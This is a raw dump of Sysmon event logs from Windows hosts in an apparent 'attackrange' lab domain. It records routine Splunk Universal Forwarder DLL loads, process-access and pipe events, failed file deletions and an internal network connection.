12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057344111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.095{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.080{8B6011A9-5ACD-618E-33F3-04000000F101}8908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.079{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:09.079{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.079{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:09.079{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:09.079{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:09.079{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000021219237Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.169{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1612729D1147F57418B6F4B367C3C8B,SHA256=1F0F536C6B688367727B17A24C3D4EC81AF3FD1066966078E19958A0AA5EB326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219236Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:09.169{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05F0678EAC7411914384F870D048218F,SHA256=2DD531E8285F1EDEBA0E0AA53A7BCD870F5DEF1B349FD96D2D1BA8F73D169861,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219267Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5ACE-618E-FFCD-08000000F101}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219266Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219265Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219264Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219263Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219262Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5ACE-618E-FFCD-08000000F101}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219261Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.982{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5ACE-618E-FFCD-08000000F101}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219260Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.967{AD5E2759-5ACE-618E-FFCD-08000000F101}5684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219259Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.622{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1612729D1147F57418B6F4B367C3C8B,SHA256=1F0F536C6B688367727B17A24C3D4EC81AF3FD1066966078E19958A0AA5EB326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219258Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.482{AD5E2759-5ACE-618E-FECD-08000000F101}16483064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219257Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.388{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C77FCBED8E94142F27CE3194CF5644F,SHA256=BE6AC835066FE5A1D8866D761B982519A1288C841C28C469E5A782210704E2F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.779{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.779{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE7B2BF5EE6C337BA5FB69E069372FB6,SHA256=20FBFA2ACF5D3A1C841FAFC7B0CF911278AD24B0F2E56B3A82EE4E118693D23Cfalsetrue 354300x800000000000000057344280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:40.415{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54506-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 534500x800000000000000057344279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.663{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 